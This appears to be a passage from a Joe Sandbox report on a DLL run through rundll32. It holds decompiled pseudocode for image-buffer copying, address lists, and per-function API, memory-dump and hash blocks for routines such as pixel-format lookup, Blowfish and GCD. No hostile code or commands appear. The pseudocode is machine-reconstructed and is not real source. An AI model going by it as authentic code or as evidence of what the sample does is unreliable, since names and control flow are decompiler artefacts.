                                                                      							_t388 = _t386 + _t555[0x26] - 1 >> _t456;
                                                                      							_t429 = _t555[0x22][4 + _t539 * 4];
                                                                      							_t555[0xc] = _t388;
                                                                      							if(_t388 <= 0) {
                                                                      								goto L18;
                                                                      							}
                                                                      							_t553 =  *(_t555 + 0x54 + _t539 * 4);
                                                                      							_t555[0x10] = _t539;
                                                                      							_t555[0xb] = 0;
                                                                      							_t398 = _t555[0x20];
                                                                      							_t555[0xd] = _t555[0x11] & _t553 + _t555[0x27] - 0x00000001;
                                                                      							do {
                                                                      								_t458 = _t553;
                                                                      								_t514 = _t398;
                                                                      								_t541 = _t429;
                                                                      								if(_t553 >= 8) {
                                                                      									if((_t398 & 0x00000001) != 0) {
                                                                      										_t514 = _t398 + 1;
                                                                      										_t541 = _t429 + 1;
                                                                      										 *_t398 =  *_t429 & 0x000000ff;
                                                                      										_t458 = _t553 - 1;
                                                                      									}
                                                                      									if((_t514 & 0x00000002) != 0) {
                                                                      										_t494 =  *_t541 & 0x0000ffff;
                                                                      										_t514 = _t514 + 2;
                                                                      										_t541 = _t541 + 2;
                                                                      										_t458 = _t458 - 2;
                                                                      										 *(_t514 - 2) = _t494;
                                                                      									}
                                                                      									if((_t514 & 0x00000004) != 0) {
                                                                      										_t495 =  *_t541;
                                                                      										_t514 = _t514 + 4;
                                                                      										_t541 = _t541 + 4;
                                                                      										_t458 = _t458 - 4;
                                                                      										 *(_t514 - 4) = _t495;
                                                                      									}
                                                                      								}
                                                                      								_t399 = memcpy(_t514, _t541, _t458);
                                                                      								_t555 =  &(_t555[3]);
                                                                      								_t555[0xb] =  &(_t555[0xb][1]);
                                                                      								_t517 = _t555[0xd];
                                                                      								_t398 = _t399 + _t517;
                                                                      								_t429 = _t429 +  *(_t555[0xe]);
                                                                      							} while (_t555[0xc] != _t555[0xb]);
                                                                      							_t539 = _t555[0x10];
                                                                      							_t68 =  &(_t555[0x20]);
                                                                      							 *_t68 = _t555[0x20] + _t555[0xc] * _t517;
                                                                      							__eflags =  *_t68;
                                                                      							L18:
                                                                      							_t539 = _t539 + 1;
                                                                      							__eflags = _t555[0xf] - _t539;
                                                                      							if(_t555[0xf] != _t539) {
                                                                      								__eflags = _t539 - 1;
                                                                      								if(_t539 <= 1) {
                                                                      									_t456 = _t555[0x12][6] & 0x000000ff;
                                                                      									_t386 = 1 << _t456;
                                                                      								} else {
                                                                      									_t386 = 1;
                                                                      									_t456 = 0;
                                                                      									__eflags = 0;
                                                                      								}
                                                                      								_t555[0xe] =  &(_t555[0xe][4]);
                                                                      								continue;
                                                                      							}
                                                                      							_t389 = _t555[0x12];
                                                                      							_t544 = _t555[0x13];
                                                                      							_t540 = _t555[0x22];
                                                                      							__eflags = _t389[8] & 0x00000002;
                                                                      							if((_t389[8] & 0x00000002) != 0) {
                                                                      								_t457 = _t555[0x20];
                                                                      								_t393 = 0;
                                                                      								__eflags = 0;
                                                                      								do {
                                                                      									 *((intOrPtr*)(_t457 + _t393)) =  *((intOrPtr*)(_t540[4] + _t393));
                                                                      									_t393 = _t393 + 4;
                                                                      									__eflags = _t393 - 0x400;
                                                                      								} while (_t393 != 0x400);
                                                                      							}
                                                                      							L28:
                                                                      							return _t544;
                                                                      							goto L121;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L121:
                                                                      			}

                                                                      0x100239bc
                                                                      0x100239be
                                                                      0x100239be
                                                                      0x100239c0
                                                                      0x100239c0
                                                                      0x100239c3
                                                                      0x100239c4
                                                                      0x100239c4
                                                                      0x100239c0
                                                                      0x100239d1
                                                                      0x100239d3
                                                                      0x100239d3
                                                                      0x100239d3
                                                                      0x100239d3
                                                                      0x100239b0
                                                                      0x1002399e
                                                                      0x00000000
                                                                      0x1002398a
                                                                      0x1002397b
                                                                      0x100236d2
                                                                      0x100236d2
                                                                      0x100236d6
                                                                      0x100236d8
                                                                      0x10023898
                                                                      0x10023898
                                                                      0x1002389e
                                                                      0x100238a5
                                                                      0x100238a7
                                                                      0x100238b9
                                                                      0x100238b9
                                                                      0x100238bd
                                                                      0x100238c1
                                                                      0x100238c4
                                                                      0x100238c9
                                                                      0x100238cd
                                                                      0x100238cf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100238b0
                                                                      0x100238b1
                                                                      0x100238b3
                                                                      0x10023a3a
                                                                      0x10023a3e
                                                                      0x10023a40
                                                                      0x100239dc
                                                                      0x100239dc
                                                                      0x100239dc
                                                                      0x10023a42
                                                                      0x10023a42
                                                                      0x10023a4d
                                                                      0x10023a4f
                                                                      0x10023a53
                                                                      0x10023a57
                                                                      0x10023a57
                                                                      0x10023a5f
                                                                      0x10023a6a
                                                                      0x10023a6e
                                                                      0x10023a71
                                                                      0x10023bcb
                                                                      0x10023bd4
                                                                      0x10023a77
                                                                      0x10023a77
                                                                      0x10023a7c
                                                                      0x10023a7c
                                                                      0x10023a7c
                                                                      0x10023a89
                                                                      0x10023a8b
                                                                      0x10023a8f
                                                                      0x10023a91
                                                                      0x10023a9b
                                                                      0x10023a9f
                                                                      0x10023aa3
                                                                      0x10023aa7
                                                                      0x10023aab
                                                                      0x10023aae
                                                                      0x10023ab2
                                                                      0x10023ab2
                                                                      0x10023ab4
                                                                      0x10023ac0
                                                                      0x10023ac0
                                                                      0x10023ac4
                                                                      0x10023ac6
                                                                      0x10023ac8
                                                                      0x10023acc
                                                                      0x10023acf
                                                                      0x10023add
                                                                      0x10023add
                                                                      0x10023adf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10023ad8
                                                                      0x10023ad9
                                                                      0x10023adb
                                                                      0x10023b50
                                                                      0x10023b50
                                                                      0x10023b54
                                                                      0x10023b56
                                                                      0x10023b59
                                                                      0x10023b5b
                                                                      0x10023b6e
                                                                      0x10023b74
                                                                      0x10023b7a
                                                                      0x10023bf0
                                                                      0x10023bf3
                                                                      0x10023bfa
                                                                      0x10023bfa
                                                                      0x10023b7c
                                                                      0x10023b82
                                                                      0x10023be5
                                                                      0x10023be8
                                                                      0x10023beb
                                                                      0x10023beb
                                                                      0x10023b84
                                                                      0x10023b8a
                                                                      0x10023bdb
                                                                      0x10023bdd
                                                                      0x10023be0
                                                                      0x10023be0
                                                                      0x10023b8c
                                                                      0x10023b8e
                                                                      0x10023b91
                                                                      0x10023b94
                                                                      0x10023b94
                                                                      0x10023b94
                                                                      0x10023b94
                                                                      0x10023b5d
                                                                      0x10023b5d
                                                                      0x10023b60
                                                                      0x10023b62
                                                                      0x10023b62
                                                                      0x10023b64
                                                                      0x10023b64
                                                                      0x10023b67
                                                                      0x10023b68
                                                                      0x10023b68
                                                                      0x10023b6c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10023adb
                                                                      0x10023ae1
                                                                      0x10023ae6
                                                                      0x00000000
                                                                      0x10023ae8
                                                                      0x10023ae8
                                                                      0x10023aec
                                                                      0x10023aee
                                                                      0x10023af2
                                                                      0x10023af5
                                                                      0x10023af7
                                                                      0x10023b98
                                                                      0x10023b9e
                                                                      0x10023c14
                                                                      0x10023c17
                                                                      0x10023c1a
                                                                      0x10023c1b
                                                                      0x10023c1f
                                                                      0x10023c26
                                                                      0x10023c26
                                                                      0x10023ba0
                                                                      0x10023ba6
                                                                      0x10023c02
                                                                      0x10023c05
                                                                      0x10023c08
                                                                      0x10023c0b
                                                                      0x10023c0e
                                                                      0x10023c0e
                                                                      0x10023ba8
                                                                      0x10023bae
                                                                      0x10023bb4
                                                                      0x10023bb6
                                                                      0x10023bb9
                                                                      0x10023bbc
                                                                      0x10023bbf
                                                                      0x10023bbf
                                                                      0x10023bae
                                                                      0x10023afd
                                                                      0x10023afd
                                                                      0x10023b03
                                                                      0x10023b07
                                                                      0x10023b0b
                                                                      0x10023b0f
                                                                      0x10023b0f
                                                                      0x10023b11
                                                                      0x10023b14
                                                                      0x10023b14
                                                                      0x10023ae6
                                                                      0x10023b19
                                                                      0x10023b27
                                                                      0x10023b29
                                                                      0x10023b29
                                                                      0x10023b29
                                                                      0x10023b29
                                                                      0x10023ac0
                                                                      0x10023b2f
                                                                      0x10023b33
                                                                      0x10023b3c
                                                                      0x10023b3c
                                                                      0x10023b46
                                                                      0x10023b46
                                                                      0x100239e8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100238b3
                                                                      0x00000000
                                                                      0x100236de
                                                                      0x100236de
                                                                      0x100236e6
                                                                      0x100236e8
                                                                      0x100236eb
                                                                      0x100236ee
                                                                      0x100236f2
                                                                      0x00000000
                                                                      0x100236f8
                                                                      0x100236f8
                                                                      0x100236fb
                                                                      0x1002375b
                                                                      0x1002375b
                                                                      0x10023766
                                                                      0x1002376a
                                                                      0x1002376c
                                                                      0x10023776
                                                                      0x10023776
                                                                      0x10023779
                                                                      0x10023781
                                                                      0x10023788
                                                                      0x1002378a
                                                                      0x1002378a
                                                                      0x1002378c
                                                                      0x10023790
                                                                      0x10023796
                                                                      0x1002379d
                                                                      0x1002379e
                                                                      0x100237a3
                                                                      0x100237ac
                                                                      0x100237b3
                                                                      0x100237b6
                                                                      0x100237bd
                                                                      0x100237c4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100237ca
                                                                      0x100237cd
                                                                      0x100237da
                                                                      0x100237da
                                                                      0x100237dc
                                                                      0x00000000
                                                                      0x100237e2
                                                                      0x100237e2
                                                                      0x100237e4
                                                                      0x100238e8
                                                                      0x100238e8
                                                                      0x100238eb
                                                                      0x100238ed
                                                                      0x100238f0
                                                                      0x10023914
                                                                      0x10023916
                                                                      0x10023926
                                                                      0x10023926
                                                                      0x100238f2
                                                                      0x100238f2
                                                                      0x100238f5
                                                                      0x10023903
                                                                      0x10023903
                                                                      0x100238f5
                                                                      0x100237ea
                                                                      0x100237ea
                                                                      0x100237f0
                                                                      0x00000000
                                                                      0x100237f6
                                                                      0x100237fe
                                                                      0x100237fe
                                                                      0x10023800
                                                                      0x10023800
                                                                      0x100237f0
                                                                      0x10023803
                                                                      0x1002380a
                                                                      0x1002380e
                                                                      0x10023810
                                                                      0x10023810
                                                                      0x10023813
                                                                      0x10023816
                                                                      0x10023816
                                                                      0x1002381a
                                                                      0x10023825
                                                                      0x10023828
                                                                      0x1002382e
                                                                      0x10023834
                                                                      0x1002383f
                                                                      0x1002384a
                                                                      0x10023855
                                                                      0x1002385d
                                                                      0x10023868
                                                                      0x1002386c
                                                                      0x1002386d
                                                                      0x10023871
                                                                      0x10023875
                                                                      0x10023878
                                                                      0x1002387c
                                                                      0x10023885
                                                                      0x10023887
                                                                      0x00000000
                                                                      0x1002388d
                                                                      0x1002388d
                                                                      0x10023891
                                                                      0x00000000
                                                                      0x10023891
                                                                      0x10023887
                                                                      0x100237cf
                                                                      0x100237cf
                                                                      0x100237d4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100237d4
                                                                      0x00000000
                                                                      0x100237cd
                                                                      0x00000000
                                                                      0x100236fd
                                                                      0x100236fd
                                                                      0x10023700
                                                                      0x10023703
                                                                      0x10023707
                                                                      0x10023709
                                                                      0x1002370c
                                                                      0x10023710
                                                                      0x10023713
                                                                      0x00000000
                                                                      0x10023719
                                                                      0x10023719
                                                                      0x1002371c
                                                                      0x00000000
                                                                      0x1002371e
                                                                      0x1002371e
                                                                      0x10023721
                                                                      0x10023724
                                                                      0x10023728
                                                                      0x1002372a
                                                                      0x1002372d
                                                                      0x10023731
                                                                      0x10023734
                                                                      0x00000000

                                                                      APIs
                                                                      • mv_image_get_buffer_size.F072 ref: 10023389
                                                                        • Part of subcall function 10023180: mv_pix_fmt_desc_get.F072 ref: 1002319F
                                                                        • Part of subcall function 10023180: mv_image_get_linesize.F072 ref: 100231D4
                                                                        • Part of subcall function 10023180: mv_image_fill_linesizes.F072(?), ref: 10023268
                                                                        • Part of subcall function 10023180: mv_image_fill_plane_sizes.F072(?), ref: 100232CB
                                                                      • mv_pix_fmt_desc_get.F072 ref: 10023393
                                                                      • mv_image_fill_linesizes.F072 ref: 1002342C
                                                                      • mv_log.F072 ref: 10023608
                                                                      • abort.MSVCRT ref: 1002360D
                                                                      • mv_pix_fmt_desc_get.F072 ref: 10023634
                                                                      • mv_pix_fmt_count_planes.F072 ref: 1002363E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_pix_fmt_desc_get$mv_image_fill_linesizes$abortmv_image_fill_plane_sizesmv_image_get_buffer_sizemv_image_get_linesizemv_logmv_pix_fmt_count_planes
                                                                      • String ID: $Assertion %s failed at %s:%d
                                                                      • API String ID: 1281078460-3513380740
                                                                      • Opcode ID: dbf823548c2b124c23c467a487ea1b459a52d23aeb8eabc41e4b7f6b7d08bb56
                                                                      • Instruction ID: fcb8fd15439f2f483d5b17ebb944bfddaf5bb174ad0b20b3751318ef1a6b0b23
                                                                      • Opcode Fuzzy Hash: dbf823548c2b124c23c467a487ea1b459a52d23aeb8eabc41e4b7f6b7d08bb56
                                                                      • Instruction Fuzzy Hash: 1F429A71A083958FC761CF28E48065EBBE1FFC8354F96892EE98997310E771E945CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_mallocz$mv_calloc
                                                                      • String ID:
                                                                      • API String ID: 1417229449-0
                                                                      • Opcode ID: 243904e0db8cc817c6db168582f6408dcccfb0ebab956b463a2e77faa3b9a132
                                                                      • Instruction ID: 852a126e1f502dc2a5b99aeb69476376aef21eb3025c4fc6af9fe8b8a21a2e70
                                                                      • Opcode Fuzzy Hash: 243904e0db8cc817c6db168582f6408dcccfb0ebab956b463a2e77faa3b9a132
                                                                      • Instruction Fuzzy Hash: CE51D374605B069FC750EFA9D480A1AF7F0FF44780F42892CE9998B601DB74F890CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_encryption_init_info_alloc.F072 ref: 10013562
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_encryption_init_info_alloc
                                                                      • String ID:
                                                                      • API String ID: 3189372936-0
                                                                      • Opcode ID: c553b2355f7102cf38e75df9346fe31f6216a4e4802c0632ce5a8ed455da1efe
                                                                      • Instruction ID: 5f2a4f4094cb7a0488fc386a39adfcdd6b5e851adb51ea05a95b9a0d2f55e3bd
                                                                      • Opcode Fuzzy Hash: c553b2355f7102cf38e75df9346fe31f6216a4e4802c0632ce5a8ed455da1efe
                                                                      • Instruction Fuzzy Hash: 44B156B1A083418FC764CF29C58461AFBE2FFC8250F56896DE9899B350E631E981CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strlen
                                                                      • String ID: %d.%06d$%d:%02d.%06d$%lld:%02d:%02d.%06d$INT64_MAX$INT64_MIN
                                                                      • API String ID: 39653677-2240581584
                                                                      • Opcode ID: d9608e42abe6f68613390a3061969c563b3d08aa44462ff096801f93028f109c
                                                                      • Instruction ID: 07d1e632b1a5896a253b897e2ae9080e0d7925084183cb4b5c2e4862e9002f9c
                                                                      • Opcode Fuzzy Hash: d9608e42abe6f68613390a3061969c563b3d08aa44462ff096801f93028f109c
                                                                      • Instruction Fuzzy Hash: 82A16C72A187118FC708CF6DD44061EFBE6EBC8750F598A2EF898D7364D674E9058B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f015b48431e7a80715030cee135de255bbf03b7162adfda3c796d469d01474f6
                                                                      • Instruction ID: 80344777319d5c39256bea2cca684abcfe3cba157365ca00e8d05506c74a31d6
                                                                      • Opcode Fuzzy Hash: f015b48431e7a80715030cee135de255bbf03b7162adfda3c796d469d01474f6
                                                                      • Instruction Fuzzy Hash: 54C19E71A087858FD354CF2D888064EBBE1FFC9294F198A2EF8D8C7355E675D9448B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTimeZoneInformation.KERNEL32 ref: 100921A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: InformationTimeZone
                                                                      • String ID:
                                                                      • API String ID: 565725191-0
                                                                      • Opcode ID: 239ab144a6ce047cfb13d847f2b01901541eb90a974f5925169c811fb4947156
                                                                      • Instruction ID: 7e8eca435f47cc72285f0ff92e2e59cf077fa7250504efb7398187b0f8841556
                                                                      • Opcode Fuzzy Hash: 239ab144a6ce047cfb13d847f2b01901541eb90a974f5925169c811fb4947156
                                                                      • Instruction Fuzzy Hash: FC2139B04093419FDB20EF28D58825ABBF0FF84350F11892DE8D987258E738D584DB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_blowfish_crypt_ecb.F072 ref: 10008642
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_blowfish_crypt_ecb
                                                                      • String ID:
                                                                      • API String ID: 997994871-0
                                                                      • Opcode ID: e25778ea9fdb925930b24f7ee5b61e2c5b198a0ae9bacbd401b09897083a4e10
                                                                      • Instruction ID: d8ffb9ab9be6425fb2f2151958634ca33b63df147d529954a2eeef9d18f7c60e
                                                                      • Opcode Fuzzy Hash: e25778ea9fdb925930b24f7ee5b61e2c5b198a0ae9bacbd401b09897083a4e10
                                                                      • Instruction Fuzzy Hash: 537145B19097818BC709CF29D5C846AFBE1FFC9245F118A5EE8DC87344E270AA04CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_mod_i
                                                                      • String ID:
                                                                      • API String ID: 416848386-0
                                                                      • Opcode ID: 3d8ce93c5e70e6cdd39acc70d59f7b57e28878e6643059ac4b681878335ad598
                                                                      • Instruction ID: dd13ca78155645af025b07bce56f249e9a9f1717602db99794a3f06de0c2c3b2
                                                                      • Opcode Fuzzy Hash: 3d8ce93c5e70e6cdd39acc70d59f7b57e28878e6643059ac4b681878335ad598
                                                                      • Instruction Fuzzy Hash: F7420872A083A18BD724CF19D05066FF7E2FFC8750F56891EE9D997390DA70A840DB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_gcd
                                                                      • String ID:
                                                                      • API String ID: 2848192316-0
                                                                      • Opcode ID: 94c61de4151f85b2e349843c83d37783726b6990a1d380f2b046a8bb30d58925
                                                                      • Instruction ID: e6b2b5b070de62496659ab70d0058dc1d8b8705572cd85af2ca405c8e7fadc16
                                                                      • Opcode Fuzzy Hash: 94c61de4151f85b2e349843c83d37783726b6990a1d380f2b046a8bb30d58925
                                                                      • Instruction Fuzzy Hash: 5DF1BF75A083508FC358CF2AC48060AFBE6AFC8750F558A2EF998D7361D670E9458F82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_pix_fmt_desc_get.F072(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 100215E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_pix_fmt_desc_get
                                                                      • String ID:
                                                                      • API String ID: 2427544746-0
                                                                      • Opcode ID: 0249601a095a9487cf98e69da83eb75bdd383411e2ebe0cdbe0f724ec450abf0
                                                                      • Instruction ID: 559f6f707dd61799b0b773c6f5cd064c8ce248da486725d9c35fe17e2713b67a
                                                                      • Opcode Fuzzy Hash: 0249601a095a9487cf98e69da83eb75bdd383411e2ebe0cdbe0f724ec450abf0
                                                                      • Instruction Fuzzy Hash: DBA138387083098FD758DE29E4507ABB7E1EF94390F94463EE866CB780EB31E9458B01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_encryption_init_info_alloc.F072 ref: 10013562
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_encryption_init_info_alloc
                                                                      • String ID:
                                                                      • API String ID: 3189372936-0
                                                                      • Opcode ID: cd6924afccd7b87e315566fc0b34ac7627ccdbad5b7df46105264a39c2b01be1
                                                                      • Instruction ID: 78d0e82bed4cec982bfd679939fa63163902b3eee1ff480991edcad54221ee49
